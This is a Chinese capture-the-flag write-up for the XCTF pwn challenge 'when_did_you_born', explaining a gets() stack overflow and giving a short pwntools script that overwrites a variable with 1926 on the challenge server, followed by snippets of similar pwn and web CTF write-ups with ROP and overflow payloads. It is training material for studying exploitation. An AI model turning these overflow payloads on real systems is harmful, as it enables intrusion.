XCTF - pwn when_did_you_born - WP

最新推荐文章于 2022-02-13 21:36:48 发布
最新推荐文章于 2022-02-13 21:36:48 发布
阅读量254 收藏
点赞数
文章标签: 运维
原文链接:http://www.cnblogs.com/Tsuiyields/p/11515377.html
版权

1.先拉进虚拟机运行一下

 

 

2.检查一下文件格式,发现是64位文件,然后这个文件开了 canary 和 Nx 保护,但是影响不大。

 

 

3.用 ida64 反编译查看一下,进入main函数。不难发现,当进入 else 分支后使得 v6 得 1926 即可得到 flag。

 

 

4.现在的问题是将第一次 v6 不得 1926 而第二次检查 v6 时却是 1926 。我们注意上面定义变量时,v5  的地址为 20h,v6 为 18h。因此我们可以构造 exp 来使用第二次输入来将 v6 覆盖为 1926。而其中两个变量的差值为 8.因此 payload 就能构造了。

 

 

 

5.

#!/usr/bin/env python
from pwn import *

# v5 - 20h    
# v6 - 18h
#result = 1926

payload = 'aaaaaaaa' + str(p64(1926))


r = remote("111.198.29.45", 57262)
r.recvuntil("Birth?")
r.sendline("2000")
r.recvuntil("Name?")
r.sendline(payload)

r.interactive()

 

 

6.运行脚本后得到 flag

 

转载于:https://www.cnblogs.com/Tsuiyields/p/11515377.html

XiaoYan8023
关注
pwn1(xctf)
weixin_43868725的博客
08-08 518
0x0 程序保护和流程 保护: 流程: 输入1能够读入长度为0x100的字符串到s而s距离rbp的距离为0x90存在明显的栈溢出,输入2能够输出s,输入3则退出程序。 0x1 利用过程 1.因为程序保护中开启了canary所以直接进行栈溢出就会触发canary。所以可以利用puts函数的特性一直输出字符直到遇到**\x00**,将canary的值输出出来。当输入0x87*‘a’+’/n’时不会有多余数据输出,而当输入0x88*‘a’+’/n’就会有多余数据输出,说明canary中有**\x00**。
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 648
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
when_did_you_born(xctf)
weixin_43868725的博客
05-06 214
0x0 程序保护和流程 保护: 流程: 分析主要程序逻辑可知,要想获得flag必须让v5等于1926但是第一次输入时v5不能等于1925。但是我们可以通过gets(&v4)将v5的值覆盖成1926。 0x1 利用过程 v4变量距离rsp的偏移为0x0,v5变量距离rsp的变量为0x8,所以当v4=‘a’*8+p64(1926)时就可以获得flag。 0x2 exp from pwn i...
day-5 xctf-when_did_you_born
a525024162806525的博客
09-25 288
xctf-when_did_you_born 题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5051 checksec文件: 没啥,ida打开: 第一个判断v5应该不等于1926,第二次判断应该等于1926,看到v4,...
sctf-when_did_you_born
just do IT
07-09 740
IDA : 思路: 输入v5 (不等于1926),, 通过v4 覆盖到v5 使其等于1926. 可以看出偏移为2 from pwn import * #sh = process('./when_did_you_born') sh = remote('111.198.29.45',52538) sh.recv() sh.sendline('1925') payload = 'AAaaaaaa'...
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1655
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-19 364
题目下载地址:点此下载 查保护 只开启了NX 查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。 这题比较简单,就不写详细解释了,直接上EXP。 EXP: # -*- coding: utf-8 -*- # @Author: 夏了茶糜 # @Date: 2020-03-19 14:01:14 # @email: sxin0807@qq.com # @Las...
XCTF-WEB-Web_php_include
Lorezon的博客
03-15 678
打开题目出现源码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> str函数对大小写敏感,考...
dice_game [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列12
重新启程
12-23 1794
题目地址:dice_game 从这篇开始就正式进入高手进阶区,一些简单的知识点我这里就不会再重复赘述了,请有需要的同学看前面的章节。 废话不多,看看题目 题目没什么提示,只是知道这个题目的来源是:XCTF 4th-QCTF-2018 下载附件,看看情况,照例做下保护机制检查 root@mypwn:/ctf/work/python/dice_game# checksec dice_g...
xctf pwn when_did_you_born
weixin_45701079的博客
09-29 149
XCTF when_did_you_born   第一次写博客,写的不好,请多指教。 首先,看ida代码 (当时因为比较简单就没看汇编)    看代码,v4和v5之间只差8字节,利用栈覆盖,用8个数据填充v4,然后把第一次的v5覆盖掉(第一次v5可以是除了1926的任意数,第二次输出v4的时候利用栈覆盖,把原来的v5覆盖成1926) 最后贴出萌新的脚本 from pwn import * io=remote("220.249.52.133",31846) io.recvuntil("What's You
xctf pwn1
qq_41071646的博客
05-14 990
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
XCTF|PWN-hello_pwn-WP
l2645470582_的博客
07-30 365
1、下载文件并开启靶机 2、用Linux查看该文件信息 checksec 2 3、该文件是64位的文件,用64位IDA打开该文件 3.1、shift+f12查看该文件关键字符串 3.2、双击关键字符串,再按ctrl+x查看"cat flag.txt"的地址 "cat flag.txt"地址:0x400686 3.3、按f5进入main函数 两个函数相差4个字节 4、编译代码 #encodi...
pwn when_did_you_born
doudoudedi
06-08 533
今天被一道被一道web给虐暴了自闭中~~~~~ 所以我做到pwn来缓缓 用ida打开只要v5=1926 就可以看flag 但按照前面的逻辑不可以等于所以 就涉及到了溢出 gets()这个很普遍了吧 直接算出偏移为8 然后就上exp咯 from pwn import * p=remote('111.198.29.45',56377) payload='a'*8+p64(1926) p.recvunt...
[pwn] - xctf题目wp
s11show_163的博客
04-26 361
int_overflow exp.py: #!/usr/bin/env python from pwn import * sh = remote("124.126.19.106",42438) flag_addr=0x08048694 payload = 'A'*0x14 + 'AAAA' + p32(flag_addr) + 'a'*(256-0x14-4-4+5) #‘A’*0x14是...
xctf pwn 踩坑笔记(一):以xctf入门题level3为例
xiongzixun的博客
10-30 506
操作环境:ubuntu16.04 +惠普台式机 IDA环境:win10 +联想笔记本** 1.打开文件 xctf中的附件一般为application/octet-stream 而且为了能够使用,我们必须要先通过chmod命令获得X权限 如果是压缩文件还要先unzip或者tar等试一下 然后,通过checksec 这个文件以后,一定要先关注Arch,也就是这个ELF究竟是64位,还是32位。 因...
XCTF|PWN-string-WP
l2645470582_的博客
08-07 243
1、下载文件并开启靶机 2、在Linux中查看文件信息 checksec 5 我们看到: 1.该文件是64位的文件 2.启用了nx 3、用命令运行程序 seccomp-tools dump ./5 我们会发现一个图案 继续往下翻 we are wizard, we will give you hand, you can not defeat dragon by yourself ... we will tell you two secret ... ...
XCTF pwn部分解题记录
windy_ll的博客
02-13 3042
一、前言     闲来无事,刷刷ctf题(PS:傻逼CSDN,标题不能包含新手二字) 二、题目: level0     1、下载好题目后,拖入到kali中去,用file和checksec查看一下,可以发现该程序是64位,只开了NX保护,如下图所示:     2、拖入到IDA中去,发现在main函数中打印出信息后就调用了vulnerable_function函数,跟进vulnerable_function函数,可以发现read函数处为栈溢出漏洞,并且可以得知该buf数组距离ebp为0x80个字节,如下图所
pwn-200(xctf)
weixin_43868725的博客
08-08 628
0x0 程序保护和流程 保护: 流程: main() overflow() 明显的栈溢出漏洞。 0x1 利用过程 1.由于题目没有给出libc的版本,所以需要通过pwntools中的DynELF或者Libcsearch得出libc的版本。 2.如果使用DynELF则需要向内存写入**/bin/sh**,而Libcsearch则不用。 3.payload的构造(以DynELF为例): payload=padding+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_
pure_color xctf
最新发布
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值